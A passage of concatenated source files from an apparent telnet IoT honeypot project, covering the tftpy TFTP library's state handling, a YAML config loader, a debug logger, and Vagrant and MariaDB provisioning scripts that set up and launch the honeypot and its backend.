hook for deliberately introducing delay in testing. DELAY_BLOCK = 0 # Initialize the logger. logging.basicConfig() # The logger used by this library. Feel free to clobber it with your own, if you like, as # long as it conforms to Python's logging. log = logging.getLogger('tftpy') def tftpassert(condition, msg): """This function is a simple utility that will check the condition passed for a false state. If it finds one, it throws a TftpException with the message passed. This just makes the code throughout cleaner by refactoring.""" if not condition: raise TftpException, msg def setLogLevel(level): """This function is a utility function for setting the internal log level. The log level defaults to logging.NOTSET, so unwanted output to stdout is not created.""" global log log.setLevel(level) class TftpErrors(object): """This class is a convenience for defining the common tftp error codes, and making them more readable in the code.""" NotDefined = 0 FileNotFound = 1 AccessViolation = 2 DiskFull = 3 IllegalTftpOp = 4 UnknownTID = 5 FileAlreadyExists = 6 NoSuchUser = 7 FailedNegotiation = 8 class TftpException(Exception): """This class is the parent class of all exceptions regarding the handling of the TFTP protocol.""" pass class TftpTimeout(TftpException): """This class represents a timeout error waiting for a response from the other end.""" pass ================================================ FILE: tftpy/TftpStates.py ================================================ """This module implements all state handling during uploads and downloads, the main interface to which being the TftpState base class. The concept is simple. Each context object represents a single upload or download, and the state object in the context object represents the current state of that transfer. The state object has a handle() method that expects the next packet in the transfer, and returns a state object until the transfer is complete, at which point it returns None. That is, unless there is a fatal error, in which case a TftpException is returned instead.""" from TftpShared import * from TftpPacketTypes import * import os ############################################################################### # State classes ############################################################################### class TftpState(object): """The base class for the states.""" def __init__(self, context): """Constructor for setting up common instance variables. The involved file object is required, since in tftp there's always a file involved.""" self.context = context def handle(self, pkt, raddress, rport): """An abstract method for handling a packet. It is expected to return a TftpState object, either itself or a new state.""" raise NotImplementedError, "Abstract method" def handleOACK(self, pkt): """This method handles an OACK from the server, syncing any accepted options.""" if pkt.options.keys() > 0: if pkt.match_options(self.context.options): log.info("Successful negotiation of options") # Set options to OACK options self.context.options = pkt.options for key in self.context.options: log.info(" %s = %s" % (key, self.context.options[key])) else: log.error("Failed to negotiate options") raise TftpException, "Failed to negotiate options" else: raise TftpException, "No options found in OACK" def returnSupportedOptions(self, options): """This method takes a requested options list from a client, and returns the ones that are supported.""" # We support the options blksize and tsize right now. # FIXME - put this somewhere else? accepted_options = {} for option in options: if option == 'blksize': # Make sure it's valid. if int(options[option]) > MAX_BLKSIZE: log.info("Client requested blksize greater than %d " "setting to maximum" % MAX_BLKSIZE) accepted_options[option] = MAX_BLKSIZE elif int(options[option]) < MIN_BLKSIZE: log.info("Client requested blksize less than %d " "setting to minimum" % MIN_BLKSIZE) accepted_options[option] = MIN_BLKSIZE else: accepted_options[option] = options[option] elif option == 'tsize': log.debug("tsize option is set") accepted_options['tsize'] = 1 else: log.info("Dropping unsupported option '%s'" % option) log.debug("Returning these accepted options: %s" % accepted_options) return accepted_options def serverInitial(self, pkt, raddress, rport): """This method performs initial setup for a server context transfer, put here to refactor code out of the TftpStateServerRecvRRQ and TftpStateServerRecvWRQ classes, since their initial setup is identical. The method returns a boolean, sendoack, to indicate whether it is required to send an OACK to the client.""" options = pkt.options sendoack = False if not self.context.tidport: self.context.tidport = rport log.info("Setting tidport to %s" % rport) log.debug("Setting default options, blksize") self.context.options = { 'blksize': DEF_BLKSIZE } if options: log.debug("Options requested: %s" % options) supported_options = self.returnSupportedOptions(options) self.context.options.update(supported_options) sendoack = True # FIXME - only octet mode is supported at this time. if pkt.mode != 'octet': self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, \ "Only octet transfers are supported at this time." # test host/port of client end if self.context.host != raddress or self.context.port != rport: self.sendError(TftpErrors.UnknownTID) log.error("Expected traffic from %s:%s but received it " "from %s:%s instead." % (self.context.host, self.context.port, raddress, rport)) # FIXME: increment an error count? # Return same state, we're still waiting for valid traffic. return self log.debug("Requested filename is %s" % pkt.filename) # There are no os.sep's allowed in the filename. # FIXME: Should we allow subdirectories? if pkt.filename.find(os.sep) >= 0: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "%s found in filename, not permitted" % os.sep self.context.file_to_transfer = pkt.filename return sendoack def sendDAT(self): """This method sends the next DAT packet based on the data in the context. It returns a boolean indicating whether the transfer is finished.""" finished = False blocknumber = self.context.next_block # Test hook if DELAY_BLOCK and DELAY_BLOCK == blocknumber: import time log.debug("Deliberately delaying 10 seconds...") time.sleep(10) tftpassert( blocknumber > 0, "There is no block zero!" ) dat = None blksize = self.context.getBlocksize() buffer = self.context.fileobj.read(blksize) log.debug("Read %d bytes into buffer" % len(buffer)) if len(buffer) < blksize: log.info("Reached EOF on file %s" % self.context.file_to_transfer) finished = True dat = TftpPacketDAT() dat.data = buffer dat.blocknumber = blocknumber self.context.metrics.bytes += len(dat.data) log.debug("Sending DAT packet %d" % dat.blocknumber) self.context.sock.sendto(dat.encode().buffer, (self.context.host, self.context.tidport)) if self.context.packethook: self.context.packethook(dat) self.context.last_pkt = dat return finished def sendACK(self, blocknumber=None): """This method sends an ack packet to the block number specified. If none is specified, it defaults to the next_block property in the parent context.""" log.debug("In sendACK, passed blocknumber is %s" % blocknumber) if blocknumber is None: blocknumber = self.context.next_block log.info("Sending ack to block %d" % blocknumber) ackpkt = TftpPacketACK() ackpkt.blocknumber = blocknumber self.context.sock.sendto(ackpkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = ackpkt def sendError(self, errorcode): """This method uses the socket passed, and uses the errorcode to compose and send an error packet.""" log.debug("In sendError, being asked to send error %d" % errorcode) errpkt = TftpPacketERR() errpkt.errorcode = errorcode self.context.sock.sendto(errpkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = errpkt def sendOACK(self): """This method sends an OACK packet with the options from the current context.""" log.debug("In sendOACK with options %s" % self.context.options) pkt = TftpPacketOACK() pkt.options = self.context.options self.context.sock.sendto(pkt.encode().buffer, (self.context.host, self.context.tidport)) self.context.last_pkt = pkt def resendLast(self): "Resend the last sent packet due to a timeout." log.warn("Resending packet %s on sessions %s" % (self.context.last_pkt, self)) self.context.metrics.resent_bytes += len(self.context.last_pkt.buffer) self.context.metrics.add_dup(self.context.last_pkt) self.context.sock.sendto(self.context.last_pkt.encode().buffer, (self.context.host, self.context.tidport)) if self.context.packethook: self.context.packethook(self.context.last_pkt) def handleDat(self, pkt): """This method handles a DAT packet during a client download, or a server upload.""" log.info("Handling DAT packet - block %d" % pkt.blocknumber) log.debug("Expecting block %s" % self.context.next_block) if pkt.blocknumber == self.context.next_block: log.debug("Good, received block %d in sequence" % pkt.blocknumber) self.sendACK() self.context.next_block += 1 log.debug("Writing %d bytes to output file" % len(pkt.data)) self.context.fileobj.write(pkt.data) self.context.metrics.bytes += len(pkt.data) # Check for end-of-file, any less than full data packet. if len(pkt.data) < self.context.getBlocksize(): log.info("End of file detected") return None elif pkt.blocknumber < self.context.next_block: if pkt.blocknumber == 0: log.warn("There is no block zero!") self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "There is no block zero!" log.warn("Dropping duplicate block %d" % pkt.blocknumber) self.context.metrics.add_dup(pkt) log.debug("ACKing block %d again, just in case" % pkt.blocknumber) self.sendACK(pkt.blocknumber) else: # FIXME: should we be more tolerant and just discard instead? msg = "Whoa! Received future block %d but expected %d" \ % (pkt.blocknumber, self.context.next_block) log.error(msg) raise TftpException, msg # Default is to ack return TftpStateExpectDAT(self.context) class TftpStateServerRecvRRQ(TftpState): """This class represents the state of the TFTP server when it has just received an RRQ packet.""" def handle(self, pkt, raddress, rport): "Handle an initial RRQ packet as a server." log.debug("In TftpStateServerRecvRRQ.handle") sendoack = self.serverInitial(pkt, raddress, rport) path = self.context.root + os.sep + self.context.file_to_transfer log.info("Opening file %s for reading" % path) if os.path.exists(path): # Note: Open in binary mode for win32 portability, since win32 # blows. self.context.fileobj = open(path, "rb") elif self.context.dyn_file_func: log.debug("No such file %s but using dyn_file_func" % path) self.context.fileobj = \ self.context.dyn_file_func(self.context.file_to_transfer) if self.context.fileobj is None: log.debug("dyn_file_func returned 'None', treating as " "FileNotFound") self.sendError(TftpErrors.FileNotFound) raise TftpException, "File not found: %s" % path else: self.sendError(TftpErrors.FileNotFound) raise TftpException, "File not found: %s" % path # Options negotiation. if sendoack: # Note, next_block is 0 here since that's the proper # acknowledgement to an OACK. # FIXME: perhaps we do need a TftpStateExpectOACK class... self.sendOACK() # Note, self.context.next_block is already 0. else: self.context.next_block = 1 log.debug("No requested options, starting send...") self.context.pending_complete = self.sendDAT() # Note, we expect an ack regardless of whether we sent a DAT or an # OACK. return TftpStateExpectACK(self.context) # Note, we don't have to check any other states in this method, that's # up to the caller. class TftpStateServerRecvWRQ(TftpState): """This class represents the state of the TFTP server when it has just received a WRQ packet.""" def handle(self, pkt, raddress, rport): "Handle an initial WRQ packet as a server." log.debug("In TftpStateServerRecvWRQ.handle") sendoack = self.serverInitial(pkt, raddress, rport) path = self.context.root + os.sep + self.context.file_to_transfer log.info("Opening file %s for writing" % path) if os.path.exists(path): # FIXME: correct behavior? log.warn("File %s exists already, overwriting..." % self.context.file_to_transfer) # FIXME: I think we should upload to a temp file and not overwrite the # existing file until the file is successfully uploaded. self.context.fileobj = open(path, "wb") # Options negotiation. if sendoack: log.debug("Sending OACK to client") self.sendOACK() else: log.debug("No requested options, expecting transfer to begin...") self.sendACK() # Whether we're sending an oack or not, we're expecting a DAT for # block 1 self.context.next_block = 1 # We may have sent an OACK, but we're expecting a DAT as the response # to either the OACK or an ACK, so lets unconditionally use the # TftpStateExpectDAT state. return TftpStateExpectDAT(self.context) # Note, we don't have to check any other states in this method, that's # up to the caller. class TftpStateServerStart(TftpState): """The start state for the server. This is a transitory state since at this point we don't know if we're handling an upload or a download. We will commit to one of them once we interpret the initial packet.""" def handle(self, pkt, raddress, rport): """Handle a packet we just received.""" log.debug("In TftpStateServerStart.handle") if isinstance(pkt, TftpPacketRRQ): log.debug("Handling an RRQ packet") return TftpStateServerRecvRRQ(self.context).handle(pkt, raddress, rport) elif isinstance(pkt, TftpPacketWRQ): log.debug("Handling a WRQ packet") return TftpStateServerRecvWRQ(self.context).handle(pkt, raddress, rport) else: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, \ "Invalid packet to begin up/download: %s" % pkt class TftpStateExpectACK(TftpState): """This class represents the state of the transfer when a DAT was just sent, and we are waiting for an ACK from the server. This class is the same one used by the client during the upload, and the server during the download.""" def handle(self, pkt, raddress, rport): "Handle a packet, hopefully an ACK since we just sent a DAT." if isinstance(pkt, TftpPacketACK): log.info("Received ACK for packet %d" % pkt.blocknumber) # Is this an ack to the one we just sent? if self.context.next_block == pkt.blocknumber: if self.context.pending_complete: log.info("Received ACK to final DAT, we're done.") return None else: log.debug("Good ACK, sending next DAT") self.context.next_block += 1 log.debug("Incremented next_block to %d" % (self.context.next_block)) self.context.pending_complete = self.sendDAT() elif pkt.blocknumber < self.context.next_block: log.debug("Received duplicate ACK for block %d" % pkt.blocknumber) self.context.metrics.add_dup(pkt) else: log.warn("Oooh, time warp. Received ACK to packet we " "didn't send yet. Discarding.") self.context.metrics.errors += 1 return self elif isinstance(pkt, TftpPacketERR): log.error("Received ERR packet from peer: %s" % str(pkt)) raise TftpException, \ "Received ERR packet from peer: %s" % str(pkt) else: log.warn("Discarding unsupported packet: %s" % str(pkt)) return self class TftpStateExpectDAT(TftpState): """Just sent an ACK packet. Waiting for DAT.""" def handle(self, pkt, raddress, rport): """Handle the packet in response to an ACK, which should be a DAT.""" if isinstance(pkt, TftpPacketDAT): return self.handleDat(pkt) # Every other packet type is a problem. elif isinstance(pkt, TftpPacketACK): # Umm, we ACK, you don't. self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received ACK from peer when expecting DAT" elif isinstance(pkt, TftpPacketWRQ): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received WRQ from peer when expecting DAT" elif isinstance(pkt, TftpPacketERR): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received ERR from peer: " + str(pkt) else: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received unknown packet type from peer: " + str(pkt) class TftpStateSentWRQ(TftpState): """Just sent an WRQ packet for an upload.""" def handle(self, pkt, raddress, rport): """Handle a packet we just received.""" if not self.context.tidport: self.context.tidport = rport log.debug("Set remote port for session to %s" % rport) # If we're going to successfully transfer the file, then we should see # either an OACK for accepted options, or an ACK to ignore options. if isinstance(pkt, TftpPacketOACK): log.info("Received OACK from server") try: self.handleOACK(pkt) except TftpException: log.error("Failed to negotiate options") self.sendError(TftpErrors.FailedNegotiation) raise else: log.debug("Sending first DAT packet") self.context.pending_complete = self.sendDAT() log.debug("Changing state to TftpStateExpectACK") return TftpStateExpectACK(self.context) elif isinstance(pkt, TftpPacketACK): log.info("Received ACK from server") log.debug("Apparently the server ignored our options") # The block number should be zero. if pkt.blocknumber == 0: log.debug("Ack blocknumber is zero as expected") log.debug("Sending first DAT packet") self.context.pending_complete = self.sendDAT() log.debug("Changing state to TftpStateExpectACK") return TftpStateExpectACK(self.context) else: log.warn("Discarding ACK to block %s" % pkt.blocknumber) log.debug("Still waiting for valid response from server") return self elif isinstance(pkt, TftpPacketERR): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received ERR from server: " + str(pkt) elif isinstance(pkt, TftpPacketRRQ): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received RRQ from server while in upload" elif isinstance(pkt, TftpPacketDAT): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received DAT from server while in upload" else: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received unknown packet type from server: " + str(pkt) # By default, no state change. return self class TftpStateSentRRQ(TftpState): """Just sent an RRQ packet.""" def handle(self, pkt, raddress, rport): """Handle the packet in response to an RRQ to the server.""" if not self.context.tidport: self.context.tidport = rport log.info("Set remote port for session to %s" % rport) # Now check the packet type and dispatch it properly. if isinstance(pkt, TftpPacketOACK): log.info("Received OACK from server") try: self.handleOACK(pkt) except TftpException, err: log.error("Failed to negotiate options: %s" % str(err)) self.sendError(TftpErrors.FailedNegotiation) raise else: log.debug("Sending ACK to OACK") self.sendACK(blocknumber=0) log.debug("Changing state to TftpStateExpectDAT") return TftpStateExpectDAT(self.context) elif isinstance(pkt, TftpPacketDAT): # If there are any options set, then the server didn't honour any # of them. log.info("Received DAT from server") if self.context.options: log.info("Server ignored options, falling back to defaults") self.context.options = { 'blksize': DEF_BLKSIZE } return self.handleDat(pkt) # Every other packet type is a problem. elif isinstance(pkt, TftpPacketACK): # Umm, we ACK, the server doesn't. self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received ACK from server while in download" elif isinstance(pkt, TftpPacketWRQ): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received WRQ from server while in download" elif isinstance(pkt, TftpPacketERR): self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received ERR from server: " + str(pkt) else: self.sendError(TftpErrors.IllegalTftpOp) raise TftpException, "Received unknown packet type from server: " + str(pkt) # By default, no state change. return self ================================================ FILE: tftpy/__init__.py ================================================ """ This library implements the tftp protocol, based on rfc 1350. http://www.faqs.org/rfcs/rfc1350.html At the moment it implements only a client class, but will include a server, with support for variable block sizes. As a client of tftpy, this is the only module that you should need to import directly. The TftpClient and TftpServer classes can be reached through it. """ import sys # Make sure that this is at least Python 2.3 verlist = sys.version_info if not verlist[0] >= 2 or not verlist[1] >= 3: raise AssertionError, "Requires at least Python 2.3" from TftpShared import * from TftpPacketTypes import * from TftpPacketFactory import * from TftpClient import * from TftpServer import * from TftpContexts import * from TftpStates import * ================================================ FILE: util/__init__.py ================================================ ================================================ FILE: util/config.py ================================================ import yaml import random import string def rand(): chars = string.ascii_uppercase + string.digits return ''.join(random.SystemRandom().choice(chars) for _ in range(32)) class Config: def __init__(self): self.distconfig = self.loadyaml("config.dist.yaml") try: self.userconfig = self.loadyaml("config.yaml") except: print "Warning: Cannot load config.yaml" self.userconfig = {} def loadyaml(self, filename): with open(filename, "rb") as fp: string = fp.read() return yaml.load(string) def loadUserConfig(self, filename): try: self.userconfig = self.loadyaml(filename) except: print "Warning: Cannot load " + str(filename) def get(self, key, optional=False, default=None): if key in self.userconfig: return self.userconfig[key] elif key in self.distconfig: return self.distconfig[key] elif not(optional): raise Exception("Option \""+ key +"\" not found in config") else: return default config = Config() ================================================ FILE: util/dbg.py ================================================ import datetime import traceback import sys import os.path DEBUG = True def dbg(msg): if DEBUG: now = datetime.datetime.now() now = now.strftime('%Y-%m-%d %H:%M:%S') line = traceback.extract_stack()[-2] line = os.path.basename(line[0]) + ":" + str(line[1]) print(now + " " + line.ljust(16, " ") + " " + msg) sys.stdout.flush() ================================================ FILE: vagrant/.gitignore ================================================ .vagrant *.log ================================================ FILE: vagrant/mariadb/Vagrantfile ================================================ # -*- mode: ruby -*- # vi: set ft=ruby : # All Vagrant configuration is done below. The "2" in Vagrant.configure # configures the configuration version (we support older styles for # backwards compatibility). Please don't change it unless you know what # you're doing. Vagrant.configure(2) do |config| # The most common configuration options are documented and commented below. # For a complete reference, please see the online documentation at # https://docs.vagrantup.com. # Every Vagrant development environment requires a box. You can search for # boxes at https://atlas.hashicorp.com/search. config.vm.box = "ubuntu/xenial64" # Disable automatic box update checking. If you disable this, then # boxes will only be checked for updates when the user runs # `vagrant box outdated`. This is not recommended. # config.vm.box_check_update = false # Create a forwarded port mapping which allows access to a specific port # within the machine from a port on the host machine. In the example below, # accessing "localhost:8080" will access port 80 on the guest machine. config.vm.network "forwarded_port", guest: 5000, host: 5000 config.vm.network "forwarded_port", guest: 2323, host: 2323 # Create a private network, which allows host-only access to the machine # using a specific IP. # config.vm.network "private_network", ip: "192.168.33.10" # Create a public network, which generally matched to bridged network. # Bridged networks make the machine appear as another physical device on # your network. # config.vm.network "public_network" # Share an additional folder to the guest VM. The first argument is # the path on the host to the actual folder. The second argument is # the path on the guest to mount the folder. And the optional third # argument is a set of non-required options. config.vm.synced_folder "../../", "/vagrant_data" # Provider-specific configuration so you can fine-tune various # backing providers for Vagrant. These expose provider-specific options. # Example for VirtualBox: config.vm.provider "virtualbox" do |vb| # Display the VirtualBox GUI when booting the machine vb.gui = false # Customize the amount of memory on the VM: vb.memory = "1024" # vb.cpus = 2 end # View the documentation for the provider you are using for more # information on available options. # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies # such as FTP and Heroku are also available. See the documentation at # https://docs.vagrantup.com/v2/push/atlas.html for more information. # config.push.define "atlas" do |push| # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME" # end # Enable provisioning with a shell script. Additional provisioners such as # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the # documentation for more information about their specific syntax and use. config.vm.provision "shell", privileged: 'false', inline: <<-SHELL sudo apt-get update sudo apt-get install -y python-pip sqlite3 screen libmysqlclient-dev python-mysqldb cp -r /vagrant_data telnet-iot-honeypot cd telnet-iot-honeypot rm database.db rm config.yaml export LC_ALL=C sudo pip install -r requirements.txt sudo bash create_config.sh sudo bash vagrant/mariadb/mysql.sh SHELL config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" sleep 5 screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" screen -list SHELL end ================================================ FILE: vagrant/mariadb/mysql.sh ================================================ #/bin/bash echo " - Install MariaDB" sudo apt-get install -y mariadb-server user=honey db=honey pw=$(openssl rand -hex 16) sql="mysql+mysqldb://$user:$pw@localhost/$db" echo " - Create DB" echo "" echo "DROP USER $user;" | sudo mysql echo "DROP USER '$user'@'localhost'" | sudo mysql echo "DROP DATABASE $db;" | sudo mysql echo "CREATE USER '$user'@'localhost' IDENTIFIED BY '$pw'; CREATE DATABASE $db CHARACTER SET latin1 COLLATE latin1_swedish_ci; GRANT ALL ON $db.* TO '$user'@'localhost'; FLUSH PRIVILEGES; " | sudo mysql echo " - Writing config" echo sql: \"$sql\" >> config.yaml ================================================ FILE: vagrant/sqlite/Vagrantfile ================================================ # -*- mode: ruby -*- # vi: set ft=ruby : # All Vagrant configuration is done below. The "2" in Vagrant.configure # configures the configuration version (we support older styles for # backwards compatibility). Please don't change it unless you know what # you're doing. Vagrant.configure(2) do |config| # The most common configuration options are documented and commented below. # For a complete reference, please see the online documentation at # https://docs.vagrantup.com. # Every Vagrant development environment requires a box. You can search for # boxes at https://atlas.hashicorp.com/search. config.vm.box = "ubuntu/xenial64" # Disable automatic box update checking. If you disable this, then # boxes will only be checked for updates when the user runs # `vagrant box outdated`. This is not recommended. # config.vm.box_check_update = false # Create a forwarded port mapping which allows access to a specific port # within the machine from a port on the host machine. In the example below, # accessing "localhost:8080" will access port 80 on the guest machine. config.vm.network "forwarded_port", guest: 5000, host: 5000 config.vm.network "forwarded_port", guest: 2323, host: 2323 # Create a private network, which allows host-only access to the machine # using a specific IP. # config.vm.network "private_network", ip: "192.168.33.10" # Create a public network, which generally matched to bridged network. # Bridged networks make the machine appear as another physical device on # your network. # config.vm.network "public_network" # Share an additional folder to the guest VM. The first argument is # the path on the host to the actual folder. The second argument is # the path on the guest to mount the folder. And the optional third # argument is a set of non-required options. config.vm.synced_folder "../../", "/vagrant_data" # Provider-specific configuration so you can fine-tune various # backing providers for Vagrant. These expose provider-specific options. # Example for VirtualBox: config.vm.provider "virtualbox" do |vb| # Display the VirtualBox GUI when booting the machine vb.gui = false # Customize the amount of memory on the VM: vb.memory = "768" # vb.cpus = 2 end # View the documentation for the provider you are using for more # information on available options. # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies # such as FTP and Heroku are also available. See the documentation at # https://docs.vagrantup.com/v2/push/atlas.html for more information. # config.push.define "atlas" do |push| # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME" # end # Enable provisioning with a shell script. Additional provisioners such as # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the # documentation for more information about their specific syntax and use. config.vm.provision "shell", privileged: 'false', inline: <<-SHELL sudo apt-get update sudo apt-get install -y python-pip sqlite3 screen cp -r /vagrant_data telnet-iot-honeypot cd telnet-iot-honeypot rm database.db rm config.yaml export LC_ALL=C sudo pip install -r requirements.txt sudo bash create_config.sh SHELL config.vm.provision "shell", privileged: 'false', run: 'always', inline: <<-SHELL screen -dmS backend bash -c "cd telnet-iot-honeypot; python backend.py" sleep 5 screen -dmS honeypot bash -c "cd telnet-iot-honeypot; python honeypot.py" screen -list SHELL end